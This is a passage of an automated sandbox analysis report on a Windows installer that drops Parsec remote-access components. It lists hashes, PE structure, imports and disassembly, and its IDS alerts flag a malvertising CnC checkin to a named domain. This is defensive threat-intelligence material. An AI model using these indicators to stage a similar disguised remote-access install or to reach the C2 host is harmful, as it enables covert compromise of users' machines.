                              SSDEEP:12:5o6Tq9Vc5h44T6YC0r7EnpnS+VKdQcBwAhcaL5vsKDHznWrV/ys4y4k10HQbclA8:5ccfXsnSn7W25E+TWrxgk0HQbclAid3
                              MD5:A5634042EFD3730706BDEE80476B450A
                              SHA1:8ABBFE4869BE217929491545A01C3ED6A7071E18
                              SHA-256:A5A9EF0B62E17CE6AF43E25491E803C00D239B160D068DEC310DEC2F86D9895E
                              SHA-512:8C1C57E7FA4CE47B1592BF44C552191357AC735A5DE5FBC5F0A472F5D9E15F71CB7C38A0F094D64089FA53B58D923A44C7D660C9F7A840C934DEEC50B7A5887D
                              Malicious:false
                              Preview:0..........0.....+.....0......0...0......h7..;._....a{..e.NB..20241113202459Z0s0q0I0...+.........]....^Idk...NG.X....h7..;._....a{..e.NB...h..3P....g..[....20241113200902Z....20241120190902Z0...*.H.............wC...._x.H.....8$4...Q...sB. .!U.........:.....t]...N.*,.T...M...{.g..wlGb,QOOn..o].B.....~.yo.`._.Q..l..a.~D.3.V....O....,.+VQbq.$.6..Y.5.K.?........../w.......V.~.x..KZ.... .f...D.}....z......~S.'/.Q:Ce.".....S_..5...dd.c.S&...@.L.4..5.&..\..h.,..|....zS...4....}._B.;.c.s...*..E.T...F.Hc8...1....-.<..XcFyg{..I......Z7.n........R7T......S..u._......]g.."vn.P.... ..3..rA$.BR..y=....a=.3.vZ_..a..Wg..M.e.b.)..lL..m.f/,..v.O..Y.NLM...........$.1?c....d.T..Q..l....'.`\s.2Z>.g..q..O..a..

                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                              Download File
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):727
                              Entropy (8bit):7.55159694457111
                              Encrypted:false
                              SSDEEP:12:5onfZfc5RlRtBfQ9x4hsjfSS97Jrm6FEL2eGszjXvScgwDoJh5oMVmfCw8iATw:5ixcdZOx4hwaSZJnFEbSY6suuCwvATw
                              MD5:50C2ACCA85675897B36B7B4BE3146ABF
                              SHA1:73F0C48A8FB60EC92EBA17C7A901703234CD0F8F
                              SHA-256:0463055A40E90C7B44AE7273A2480F8FC5AC657EB7CDFD2F1D7E44129CCD5E76
                              SHA-512:1902E8B97988E3D68B02047D68686BF3C68B36E262014F0B40EF920D066B83F21FBBACA5EC3B3C37C961FC06EE39A2FAFE42A896D54F1A4FC748A31D71BA3E61
                              Malicious:false
                              Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20241113184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20241113184215Z....20241120184215Z0...*.H.............9....i.3L../9Y...../I.df...'*9....>i..`*};GZq%k...O..P.{...3F.....2r......W[....j........PY.&..h=.T....zY..Y0..Ou.!...1...(.RN....v..&8H.$_H......(.. HX.=..#.3A.'...<..T...1^.ZRx..V....v..y..Y....._.r.eh.[.b...<o./..;8.Vf;K.&6{.3o.0K^.Z.........U....7.*x.A......1...!........u`[SB.5%.y`..~_M..g.i......_..t.1K.<@S.d/6d.f.ya.G....l..rv..@.k}\p...d.........r..(..d..5V..v....5.@7:....#]J..o.H.tT...l.0#Y.y.@..9.Y..T.+.f8A..R.p.8.O+/....>lK...p5).,(.3.#s&.......C.Z.R...Y..a"Q...4....E....

                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                              Download File
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):400
                              Entropy (8bit):3.9102857171427017
                              Encrypted:false
                              SSDEEP:6:kKy9/VEk9/IBQEXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:A/VAuamxMiv8sFzD3quqDkPh8Y2ZM
                              MD5:A996B182C0635F92CCE244B4E50318EF
                              SHA1:123F39C245DEB7670C974CEB8FC17CBE0D7A304B
                              SHA-256:DE685C0B255C51EAA2E874BB7056E461A19E380C09AE87A9CB10BE187CA5FC92
                              SHA-512:0D154F181FD6BA82AA266A84B171054ED03675BBE0A3D4D2F38AFED12A31531972EBCE1E1FD41DDA614B1A2F1C9AEBD252155015D47085FD02E6FF2FB2AE6626
                              Malicious:false
                              Preview:p...... ........w3.:6..(................>..55...~...:...................~...:.. ..........c-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DD342DC083F9240614EBCF70523A8426

                              Download File
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):408
                              Entropy (8bit):3.9464847979504727
                              Encrypted:false
                              SSDEEP:6:kKIF/TjAQfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhle6C9o1kn:2DmxMiv8sF3HtllJZIvOP20S9o1k
                              MD5:1177E50A76DB3838AE6C8476E3E2F6EE
                              SHA1:3F5E8DD211729A7F05440A3D581732F2341A0F44
                              SHA-256:E54BB9E0B5024CE6D226D21AC0F9D605D2BED1AF6305F17ED72B4C3AB580A1D3
                              SHA-512:018E86C89DA5F7A196BEF3FF00953AABDF05673D253A43FC10EDFC1D24D8F1F5DB8770CEB1EC76DCDEDA676E6BD19EE3AC1BADC5AD90B378D747337484F144C1
                              Malicious:false
                              Preview:p...... ....$.....=.:6..(................C...6.......;.......................;.. ........H.r56.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.l.o.E.u.g.z.U.P.G.t.9.O.n.V.Z.%.2.F.P.P.g.l.s.%.3.D...

                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                              Download File
                              Process:C:\Program Files\Parsec\pservice.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):412
                              Entropy (8bit):4.004975054723184
                              Encrypted:false
                              SSDEEP:6:kKmRNzR1MyFiUfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:eRRRBJmxMiv8sFBSfamB3rbFURMOlAkr
                              MD5:1950180D10CB8934CFB0C1B5839C678C
                              SHA1:50FED07FF70A6C14ADE1DE18DCB6CED2AC054508
                              SHA-256:46C82A83C156EC96ED17381074A106A3A19B79514A26EC89EFBB44DFADD8E0E8
                              SHA-512:DC98E8F8C585E92A1C0281463F25BA0F1C9044A8CB81939F32A5F704E126BF216C078C8E46B89A8B6639FEAE9A5A07EA9AC5FBCF88FF9E624E2FCF5875FF13CA
                              Malicious:false
                              Preview:p...... ....(.......:6..(.................F..5...]*.{;...................]*.{;.. ..........[-6.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                              \Device\ConDrv

                              Download File
                              Process:C:\Windows\SysWOW64\netsh.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):7
                              Entropy (8bit):2.2359263506290326
                              Encrypted:false
                              SSDEEP:3:t:t
                              MD5:F1CA165C0DA831C9A17D08C4DECBD114
                              SHA1:D750F8260312A40968458169B496C40DACC751CA
                              SHA-256:ACCF036232D2570796BF0ABF71FFE342DC35E2F07B12041FE739D44A06F36AF8
                              SHA-512:052FF09612F382505B049EF15D9FB83E46430B5EE4EEFB0F865CD1A3A50FDFA6FFF573E0EF940F26E955270502D5774187CD88B90CD53792AC1F6DFA37E4B646
                              Malicious:false
                              Preview:Ok.....

                              \Device\Null

                              Download File
                              Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):70
                              Entropy (8bit):4.795224760012763
                              Encrypted:false
                              SSDEEP:3:tR60PUdZ4jcRCFMLDJOBFXRN8y:CdZ4jcZLDJOBFBN8y
                              MD5:9D2F373995D9E914835C389C91AD69ED
                              SHA1:2B497BAFFF1FE8C1B8128D5D78A5BFC591C5FE61
                              SHA-256:BBB2978DAFCCA12DF906ED63901251181902B7B567A8C95E08746C35212CDA7F
                              SHA-512:4A650C623495DCAA47F11158B6A67D4899B4127501FE50753E2E08FABF1BFBAE7ADAD17434C109A7D3B925AC33CB7295BC1F4B9BB034D350FD07E0FC71836B1A
                              Malicious:false
                              Preview:2024-11-13 21:12:18,893 INFO [default] Driver installed successfully..

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.997278229743437
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 98.45%
                              • Inno Setup installer (109748/4) 1.08%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Win16/32 Executable Delphi generic (2074/23) 0.02%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              File name:uu8v4UUzTU.exe
                              File size:50'493'432 bytes
                              MD5:2d2f050e6c898065032cb2686a0effca
                              SHA1:0d3c1fbd9b7db74fdb5ee155b610d86319d9fa51
                              SHA256:4c750c11a04f90c9922ace4a237dc256d7e71fa512d4857922cc7d46bb4ba0e9
                              SHA512:5fcd58c259cd020f5b4afe8802a6588e7a942ef53cf5175f6f18c900e8ed7e6b5009370b0b0e06969e4ecc7c26dcd7e8f3318907411fc7df62ccb797ec04f67e
                              SSDEEP:786432:HyiiDc4ImIc9SLIJyNwsNBIRya++/sC89UTh/1m1OO2+3FJRYd17TV+s:SiiD9KL85sNBIRyX0M9gG1OO//2rh+s
                              TLSH:E4B7333B71A4B43FC4AA463A5F73531448B37E91A9C78D2A43E0161CCB25EA01E7A777
                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                              File Icon

                              Icon Hash:01020d1930310f3c

                              Static PE Info

                              General

                              Entrypoint:0x4b5eec
                              Entrypoint Section:.itext
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6258476F [Thu Apr 14 16:10:23 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:6
                              OS Version Minor:1
                              File Version Major:6
                              File Version Minor:1
                              Subsystem Version Major:6
                              Subsystem Version Minor:1
                              Import Hash:e569e6f445d32ba23766ad67d1e3787f

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=SSL.com EV Code Signing Intermediate CA RSA R3, O=SSL Corp, L=Houston, S=Texas, C=US
                              Signature Validation Error:A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
                              Error Number:-2146762495
                              Not Before, Not After
                              • 29/08/2024 01:06:14 28/08/2025 19:23:48
                              Subject Chain
                              • OID.1.3.6.1.4.1.311.60.2.1.3=KE, OID.2.5.4.15=Private Organization, CN=KEMROSE ENTERPRISES LTD, SERIALNUMBER=CPR/2010/34857, O=KEMROSE ENTERPRISES LTD, L=Nairobi, S=Nairobi, C=KE
                              Version:3
                              Thumbprint MD5:6E17F82AC2A84546205F6D343FA436A5
                              Thumbprint SHA-1:E1AA448D29371254654C29C65A5309686ACD93D0
                              Thumbprint SHA-256:A89FF2FD4D4690D199C5DAC33F5EF7D9DBB10069213FD2A60389870CE960CF27
                              Serial:1BF8761F7761C3FDB27BF20B88C21357

                              Entrypoint Preview

                              Instruction
                              push ebp
                              mov ebp, esp
                              add esp, FFFFFFA4h
                              push ebx
                              push esi
                              push edi
                              xor eax, eax
                              mov dword ptr [ebp-3Ch], eax
                              mov dword ptr [ebp-40h], eax
                              mov dword ptr [ebp-5Ch], eax
                              mov dword ptr [ebp-30h], eax
                              mov dword ptr [ebp-38h], eax
                              mov dword ptr [ebp-34h], eax
                              mov dword ptr [ebp-2Ch], eax
                              mov dword ptr [ebp-28h], eax
                              mov dword ptr [ebp-14h], eax
                              mov eax, 004B14B8h
                              call 00007F08750CA9A5h
                              xor eax, eax
                              push ebp
                              push 004B65E2h
                              push dword ptr fs:[eax]
                              mov dword ptr fs:[eax], esp
                              xor edx, edx
                              push ebp
                              push 004B659Eh
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              mov eax, dword ptr [004BE634h]
                              call 00007F087516D497h
                              call 00007F087516CFEAh
                              lea edx, dword ptr [ebp-14h]
                              xor eax, eax
                              call 00007F08750E0444h
                              mov edx, dword ptr [ebp-14h]
                              mov eax, 004C1D84h
                              call 00007F08750C5597h
                              push 00000002h
                              push 00000000h
                              push 00000001h
                              mov ecx, dword ptr [004C1D84h]
                              mov dl, 01h
                              mov eax, dword ptr [004238ECh]
                              call 00007F08750E15C7h
                              mov dword ptr [004C1D88h], eax
                              xor edx, edx
                              push ebp
                              push 004B654Ah
                              push dword ptr fs:[edx]
                              mov dword ptr fs:[edx], esp
                              call 00007F087516D51Fh
                              mov dword ptr [004C1D90h], eax
                              mov eax, dword ptr [004C1D90h]
                              cmp dword ptr [eax+0Ch], 01h
                              jne 00007F087517373Ah
                              mov eax, dword ptr [004C1D90h]
                              mov edx, 00000028h
                              call 00007F08750E1EBCh
                              mov edx, dword ptr [004C1D90h]

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0xc40000x9a.edata
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc20000xfdc.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x1e5a0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x30269380xec0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0xc60000x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0xc22f40x254.idata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0xc30000x1a4.didata
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000xb39e40xb3a0043af0a9476ca224d8e8461f1e22c94daFalse0.34525867693110646data6.357635049994181IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .itext0xb50000x16880x1800185e04b9a1f554e31f7f848515dc890cFalse0.54443359375data5.971425428435973IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .data0xb70000x37a40x3800cab2107c933b696aa5cf0cc6c3fd3980False0.36097935267857145data5.048648594372454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .bss0xbb0000x6de80x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata0xc20000xfdc0x1000e7d1635e2624b124cfdce6c360ac21cdFalse0.3798828125data5.029087481102678IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .didata0xc30000x1a40x2008ced971d8a7705c98b173e255d8c9aa7False0.345703125data2.7509822285969876IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .edata0xc40000x9a0x2008d4e1e508031afe235bf121c80fd7d5fFalse0.2578125data1.877162954504408IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .tls0xc50000x180x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rdata0xc60000x5d0x2008f2f090acd9622c88a6a852e72f94e96False0.189453125data1.3838943752217987IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .rsrc0xc70000x1e5a00x1e6000ccf407773fbfa810622326e22620cbbFalse0.18008134002057613data3.5767248033948214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xc75580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.4441489361702128
                              RT_ICON0xc79c00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304EnglishUnited States0.294672131147541
                              RT_ICON0xc83480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishUnited States0.21411819887429642
                              RT_ICON0xc93f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.13838174273858922
                              RT_ICON0xcb9980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.1069910250354275
                              RT_ICON0xcfbc00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.05820418786229741
                              RT_ICON0xe03e80x21f9PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9807979763136714
                              RT_STRING0xe25e40x360data0.34375
                              RT_STRING0xe29440x260data0.3256578947368421
                              RT_STRING0xe2ba40x45cdata0.4068100358422939
                              RT_STRING0xe30000x40cdata0.3754826254826255
                              RT_STRING0xe340c0x2d4data0.39226519337016574
                              RT_STRING0xe36e00xb8data0.6467391304347826
                              RT_STRING0xe37980x9cdata0.6410256410256411
                              RT_STRING0xe38340x374data0.4230769230769231
                              RT_STRING0xe3ba80x398data0.3358695652173913
                              RT_STRING0xe3f400x368data0.3795871559633027
                              RT_STRING0xe42a80x2a4data0.4275147928994083
                              RT_RCDATA0xe454c0x10data1.5
                              RT_RCDATA0xe455c0x2c4data0.6384180790960452
                              RT_RCDATA0xe48200x2cdata1.1818181818181819
                              RT_GROUP_ICON0xe484c0x68dataEnglishUnited States0.7884615384615384
                              RT_VERSION0xe48b40x584dataEnglishUnited States0.26203966005665724
                              RT_MANIFEST0xe4e380x765XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39091389329107235

                              Imports

                              DLLImport
                              kernel32.dllGetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
                              comctl32.dllInitCommonControls
                              version.dllGetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
                              user32.dllCreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
                              oleaut32.dllSysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
                              netapi32.dllNetWkstaGetInfo, NetApiBufferFree
                              advapi32.dllConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

                              Exports

                              NameOrdinalAddress
                              TMethodImplementationIntercept30x4541a8
                              __dbk_fcall_wrapper20x40d0a0
                              dbkFCallWrapperAddr10x4be63c

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishUnited States

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-11-14T03:11:52.847685+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.44973334.160.111.145443TCP
                              2024-11-14T03:11:53.815227+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734188.114.97.3443TCP
                              2024-11-14T03:11:54.801247+01002051091ET MALWARE Unknown Malvertising Payload CnC Checkin (PSecWin)1192.168.2.449734188.114.97.3443TCP
                              2024-11-14T03:11:56.380228+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449735TCP
                              2024-11-14T03:12:34.698407+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.449751TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 14, 2024 03:11:52.207962036 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:52.208058119 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:52.208156109 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:52.210695982 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:52.210736990 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:52.847548008 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:52.847685099 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:52.851726055 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:52.851756096 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:52.852185965 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:52.895546913 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:52.939336061 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:53.149632931 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:53.149825096 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:53.149993896 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:53.152533054 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:53.152533054 CET49733443192.168.2.434.160.111.145
                              Nov 14, 2024 03:11:53.152601957 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:53.152642012 CET4434973334.160.111.145192.168.2.4
                              Nov 14, 2024 03:11:53.176485062 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:53.176568985 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:53.176670074 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:53.176953077 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:53.176990986 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:53.815001011 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:53.815227032 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:53.832968950 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:53.833024025 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:53.833484888 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:53.839680910 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:53.839680910 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:53.839906931 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:54.801353931 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:54.801518917 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:54.801610947 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:54.801707029 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:54.801707029 CET49734443192.168.2.4188.114.97.3
                              Nov 14, 2024 03:11:54.801753044 CET44349734188.114.97.3192.168.2.4
                              Nov 14, 2024 03:11:54.801781893 CET44349734188.114.97.3192.168.2.4

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Nov 14, 2024 03:11:52.196865082 CET5889653192.168.2.41.1.1.1
                              Nov 14, 2024 03:11:52.204200029 CET53588961.1.1.1192.168.2.4
                              Nov 14, 2024 03:11:53.161288977 CET5854853192.168.2.41.1.1.1
                              Nov 14, 2024 03:11:53.175715923 CET53585481.1.1.1192.168.2.4
                              Nov 14, 2024 03:12:22.228529930 CET6457253192.168.2.41.1.1.1
                              Nov 14, 2024 03:12:22.235949993 CET53645721.1.1.1192.168.2.4

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Nov 14, 2024 03:11:52.196865082 CET192.168.2.41.1.1.10x96b4Standard query (0)ifconfig.meA (IP address)IN (0x0001)false
                              Nov 14, 2024 03:11:53.161288977 CET192.168.2.41.1.1.10x6000Standard query (0)beautifullyuncluttered.comA (IP address)IN (0x0001)false
                              Nov 14, 2024 03:12:22.228529930 CET192.168.2.41.1.1.10x8175Standard query (0)builds.parsec.appA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Nov 14, 2024 03:11:52.204200029 CET1.1.1.1192.168.2.40x96b4No error (0)ifconfig.me34.160.111.145A (IP address)IN (0x0001)false
                              Nov 14, 2024 03:11:53.175715923 CET1.1.1.1192.168.2.40x6000No error (0)beautifullyuncluttered.com188.114.97.3A (IP address)IN (0x0001)false
                              Nov 14, 2024 03:11:53.175715923 CET1.1.1.1192.168.2.40x6000No error (0)beautifullyuncluttered.com188.114.96.3A (IP address)IN (0x0001)false
                              Nov 14, 2024 03:11:57.952488899 CET1.1.1.1192.168.2.40x5e4fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                              Nov 14, 2024 03:11:57.952488899 CET1.1.1.1192.168.2.40x5e4fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                              Nov 14, 2024 03:12:22.235949993 CET1.1.1.1192.168.2.40x8175No error (0)builds.parsec.app104.18.0.181A (IP address)IN (0x0001)false
